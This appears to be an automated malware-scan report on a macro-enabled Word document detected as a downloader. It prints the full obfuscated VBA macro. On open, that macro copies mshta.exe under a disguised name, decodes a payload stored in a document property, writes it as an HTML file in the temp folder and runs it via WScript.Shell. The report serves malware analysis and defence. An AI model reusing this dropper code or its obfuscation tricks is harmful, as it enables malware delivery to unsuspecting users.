MALICIOUS
138
Risk Score
Heuristics 6
-
ClamAV: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Call CreateObject("ws" + aVfEjo + "ell").run(a3vhqc) -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
aHDWhJ = Environ(aftS0N) -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
- http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
- http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 11473 bytes |
SHA-256: aada9466c451f0f49184ee7cd5e9cabcef78f84710c18f392aebe525aba1f33c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "aPVeG"
Sub AutoOpen()
' Cant defunct se
' Trackless defendant rapacious sunny inspired enclose
' Odorous aztec lets
' Trowel abs electricity
' Exposure saintly
' Showed terra chest octavo tolerant
' Maudlin antibody guitar hygienic pix
' Guy neapolitan buzzard compounds scotia prematurely
' Paintings considerable appointment fallible reported katie
' Fido verger lending
' Blackberry hepatitis
aHp9QA
End Sub
Attribute VB_Name = "ac6xZ"
Public Const axOvH As String = ""
Public Const aINVm As Integer = 2166 - 2153
Public Const aIgWCc As String = "1ridn1iw1"
Public Const aEwB5 As String = "231met1sys1"
Public Const arTI57 As String = "p1m1e1t"
Public Const aVfEjo As String = "cript.sh"
Function aUgiI()
End Function
Sub aRY8BT(ajDfe)
' Owner fool eclipse
' Circuits chew ministers eating
' Permanence guild organist electrode illustrations
' Cordova mummy barnet adjutant
' Steeple eliminate consoles lick accomplishing wider
' Scope means delirious deputy instance cramp
' Achievement diadem pillow
' Protected refers hawk enables
' Shant apropos skirts civic
' Preparing callous
' Crest vote
' Use winners
' Dumb
' Synagogue lag locust inception absently
' Dawns unconcerned joins theocracy
' Unmarked emphasize consistent
' Median valise kentucky stores
' Bungalow nutter miniature reveals kurt
' Facilities halifax prelate abstractions europa
' Protocol crutch fatty manhattan
' Overall
' Deaden trial german
' Advisor choler ogre stars
' Guidelines
' Cow poplar
' Anterior supervisor fingering
' Gary appease
' Designers item
' Reopen los oscar
' Brands bubble stigma atlantic
' Spinach demonstrated murder rid viewpoint
' Jacket
' Modern ep libs ecstatic binding outlawed
' Chlorine spurn gymnastics
End Sub
Function apnQ7m(a2nD1q)
apnQ7m = ActiveDocument.BuiltInDocumentProperties(a2nD1q)
End Function
Public Sub aFWou8()
amL2S
End Sub
Public Sub aoEO6()
azl4W
End Sub
Attribute VB_Name = "aFwMYV"
Public Function a6MfL0(akgLrj, aiskcv)
' Crown nail
FileNumber = FreeFile
Open akgLrj For Output As #FileNumber
' Benignant fluently
Print #FileNumber, aiskcv
Close #FileNumber
End Function
Sub aUoks(atOXAG, aNLDI)
' Cleaners discontinued gravy sprightly turret sunset
' Irwin sleeper reynard repairs minion
' Decor mourner englishwoman placard ignoramus abscess
' Zeb ostentatious routing seaside pediatric jane
' Dingle calm ticklish adapted rake
' Shanghai
' Unavoidable absolutely raises arousing recover abatement
' Src inviolable associating
' Jasmine omniscient coeval ode honors veda care
' Sealed tiles gui
' Nano
' Stays archived unnecessarily string breakfast
' Concave pickle imbibe passed
' Verbal awkwardness procreation
' Initial
' Souvenir yourself grill forceful
' Boxed censor
' Botanist georgetown
' Chassis v bronze
' Dates
' Irwin denounce birth acorn
' En- loathsome permits
FileCopy atOXAG, aNLDI
End Sub
Function awr74I(aBT6tK)
' Developer
' Hectic stupefaction
' Fifth sky undoing
' Hollow westminster telescope ensign electorate
' Contracts payment investigated
' Easier switch menial
' Injured agreements dsl
' Lazy overflow almanac foray
' Unknown amateur repugnance lurch
' Anthea platoon
awr74I = aBT6tK
End Function
Function a83V9(aBT6tK) As String
Dim aYbfea As Long
Dim aueoc As Integer
Dim aniB35 As Integer
For aYbfea = 1 To Len(aBT6tK)
aniB35 = 0
aERVb = Mid(aBT6tK, aYbfea, 1)
' Stewart cc grain compiler
' Computational storied tedium libyan
' Thumbs faqs curtail mercy
' Outdo jul delivered kong boxer
' Sloppy millennium
' Sticks tarts
' Cornish dimensions cole
' Hawaii scanned laden
' Locker richard pressing warrior ferry
' Vhs uzbekistan civil agape
aueoc = Asc(aERVb)
If (aueoc > aq8k6(4126 - 4125) And aueoc < aq8k6(10192 / 5096)) Or (aueoc > aq8k6(-7805 + 7808) And aueoc < aq8k6(6994 - 6990)) Then
' Beautiful acceptable laity dominican brighton
' Perishing forger matched pout
' Happening configuring oracular subscriptions
' Hoc clockwork pump
' Celt undisputed concentrate moderately incision
' Pace haughtily stockholm dictionaries
' Mattress onlooker
' Vocational diana
' Fiftieth ruse lake
' Ram na
' Vegas sew
aniB35 = aINVm
' Plastic good transparency bi
aueoc = awa9t(aueoc, aniB35)
If aueoc < aq8k6(5) And aueoc > 83 Then
aueoc = aCKyG(aueoc)
ElseIf aueoc < -283 + 348 Then
aueoc = aCKyG(aueoc)
End If
End If
ahsHb = aacdg(aueoc)
Mid$(aBT6tK, aYbfea, 1) = awr74I(ahsHb)
Next aYbfea
a83V9 = aBT6tK
End Function
Attribute VB_Name = "ayoUR"
Function aHO829(a4T9x)
' Ire mightnt darken
' Reciprocity dolt
' Applies suns fg
' Dearborn claims
' Serenade ga wishing pantry cabaret
' Catch container cast
' Viewpicture
' Clarity rely ukraine jackson waves dies hero
' Tea networking townships figure
' Finishing footwear
' Exhilaration philanthropic shakespearean indigenous viscera
' Punctilious freak pj
' Infinitive salient coiled tits
' Footwear urn
' Mysimon titanic
' Spell
' Fellow recognizable
' Trend mistook okay side
' Abhor bracket passing
' Unchanging lebanon hight distillation
' Wages legally graham unavailing stage classified
' Triangular medline heifer str
a2G56m = a4T9x
aEcpO = Len(a2G56m)
For aCwAc = 0 To aEcpO - 1
' Solidity bulldog inclusive plaintiff pacific
' Answer academies xx
' Cad mica
' Steven sustained av farcical
' Metaphor phosphoric strikes hinting oasis
' Rumania load everyday
' Carnival flounder alias spelling parsonage
' Super translucent disposition
' Threaded collaboration hose assumption aphorism
' Biographical ciao arsenal functional andros
' Elsewhere
' Pitch company builders honor surprised paulo
a6Xmt = a6Xmt & Mid(a2G56m, (aEcpO - aCwAc), 1)
Next aCwAc
aHO829 = a6Xmt
End Function
Public Function aSzWfu(awfM5)
' Beetles salzburg
' Crape rebus specify
' Arbiter volvo cleanly womens
' Dicke darius facility groups
' Commensurate sight civic syracuse attraction
' Weal prescribe across holders
' Businesses conduit islam
' Wizened immaculate bawl rules abner
' Ri wield literature genre
' Arc accounting
' Ghost guestbook owns
aSzWfu = Replace(awfM5, axOvH, "")
End Function
Sub aHp9QA()
' Arsenic healthy
' Slave-girl teller gretchen
' Keynote consistently algiers prank impaired
' Isabelle golden gc shack
' Aquatic
' Cartridges wr usher
' Epidemic lukewarm
' Trapper quietude jessica
' Boatswain ozone listening
' Minds harmonic
' Guiana hewlett incautious berber
aFWou8
' Demo wrest corkscrew sucking
' Fattening bathroom putrid briefing
' Strengths grinder echoing
' Notices
' Frontispiece pointer heraldic
' Thereat
' Conclusions arabic japanese remind
' Matrix nursing
' Bestial simon occurrence persian side
' Cadet inkling
' Sandwich regent co library
' Olivia rating
' Twenty-ninth armenia
' Hearings irritate mexican unattended
' Cooperative circuitous
' Spoke encore biology greene initial
' Entries
' Greater predict
' Oyster leakage remove malevolent officer
' Cage playing riders
' Rely monster evangelist gloucestershire
' Scripts configured belinda cake pitiable tottering
aoEO6
' Helps overdo unchallenged reflects
' Mp fox influence venom
' Deaden notes
' Gregarious somebody gleefully
' Forecastle needed dangling
' Acquiesce
' Fireman march nominations gillian luxembourg
' Malaysia dissertation bastion extent etc
' Sbjct creates shrewdly endless fy
' Chapel pears bravo
' Coach annihilation transitive beech
Call CreateObject("ws" + aVfEjo + "ell").run(a3vhqc)
End Sub
Attribute VB_Name = "arzlh"
Function aHDWhJ(aftS0N)
' Nectar translated jugs
' Selective
' Pears dock emily
' Infrared logitech conservation slash
' Completes recipe grafting
' Heraldry mechanical
' Clam effectiveness
' Terrifying unformed turban detailed forwarding
' Ict immediately
' Sift stars desperate depth transmitter collective herald
' Options disable
aHDWhJ = Environ(aftS0N)
End Function
Function al189()
' Behavioral
' Mj mystery jolt pope
' Internationally filing cannonade paraphernalia
' Please solution
' Photography brats retailers smithsonian foothold
' Jacob crowd elope behavioral
' Emporium retrieve capacity suspension incentives hives tough
' Pliant japanese
' Asthma dec allah allergy biodiversity
' Belongs pistil failing
' Elopement
With Application
al189 = .PathSeparator
End With
End Function
Function a6SPR(aj0OA)
a9xe2 = VBA.Split(aHO829("lmth.ni|moc.ni|exe.athsm"), "|")
' Birds aurora catarrh stockings
' Ruffian shared
' Accomplish shyness sinuous intangible
' Parcel nude unfavorable
' Compassionate barrage theaters
' Bile ad confusion
' Flatterer creeper opinions breaking strictly emendation cfr
' Sheep maltreated units knitted would-be secretariat
' All perpetuate sewer onslaught
' Simpson quire pinafore annotated brewery
' Dejected sustainability thereabout
' Cell
' Buyers synonym appropriations
Select Case aj0OA
' Lloyd bermuda attempts
' Ajax sprouted repudiate hamlet
' Tuning submissions wanted what vaulting broad
' Easy pawnbroker
' Absolutely laplace
' Adjacent freight
' Warm-hearted dame surf tablet
' Transept sustainable
' Springs combatant cnn
' 911 sacrilege saddam stitch
' Watson
Case 0:
' Bureaucracy merry deduction
' Chary paintings world
' Porn patriarch proposed seashore serial tattoo rome
' Fog
' Preliminary determined relatives humid financial
' Maya shove cavalcade propensity bleached dow
' Warring emerald godless homespun
' Wealth inbox
' Consultancy loathsome plays commemoration stucco
' Mantua leading mesquite
' Entities
a6SPR = aHDWhJ(Replace(aHO829(aIgWCc), "1", "")) & al189 & Replace(aHO829(aEwB5), "1", "") & al189 & a9xe2(0)
' Daughters albion colt higher mustang bid
Case 1:
' Below summed athens european ranges siliceous
a6SPR = aHDWhJ(Replace(aHO829(arTI57), "1", "")) & al189 & a9xe2(1)
Case 2:
a6SPR = aHDWhJ(Replace(aHO829(arTI57), "1", "")) & al189 & a9xe2(2)
End Select
End Function
Sub azl4W()
a6ukP = aKVTw2(a6SPR(2))
a6MfL0 a6ukP, a83V9(apnQ7m("category"))
End Sub
Attribute VB_Name = "aTmN3"
Function aGsWq(a13doQ)
aGsWq = (aSzWfu(a13doQ))
End Function
Function asmDM(aO7rg)
' Room
asmDM = (aSzWfu(aO7rg))
End Function
Function aKVTw2(aKidHD)
' Routines clark
aKVTw2 = (aSzWfu(aKidHD))
End Function
Function a3vhqc()
afN8C7 = asmDM(a6SPR(1))
aRWZGB = aKVTw2(a6SPR(2))
a3vhqc = afN8C7 & " " & aRWZGB
End Function
Attribute VB_Name = "amoUM9"
Sub amL2S()
andAO = aGsWq(a6SPR(0))
avgsao = asmDM(a6SPR(1))
aUoks andAO, avgsao
End Sub
Function aCKyG(aw2mIS)
aCKyG = aw2mIS + -1165 + 1191
End Function
Function aq8k6(a0YEVp)
If a0YEVp = 0 Then
aq8k6 = 15101 - 15100
ElseIf a0YEVp = 1 Then
aq8k6 = -139 + 203
ElseIf a0YEVp = 2 Then
aq8k6 = -220 + 311
ElseIf a0YEVp = 3 Then
aq8k6 = 189 - 93
ElseIf a0YEVp = 4 Then
aq8k6 = 250 - 127
ElseIf a0YEVp = 5 Then
aq8k6 = -27 + 124
Else
aq8k6 = 512 * 2
End If
End Function
Function awa9t(aw2mIS, a1U5D)
awa9t = aw2mIS - a1U5D
End Function
Function aacdg(aw2mIS)
aacdg = VBA.ChrW(aw2mIS)
' Unimpeachable johnston
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 49152 bytes |
SHA-256: 081a058c0abdaf8b6402531fe08172caaf5768a64aa2dfe39db5d9a619cd577e |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.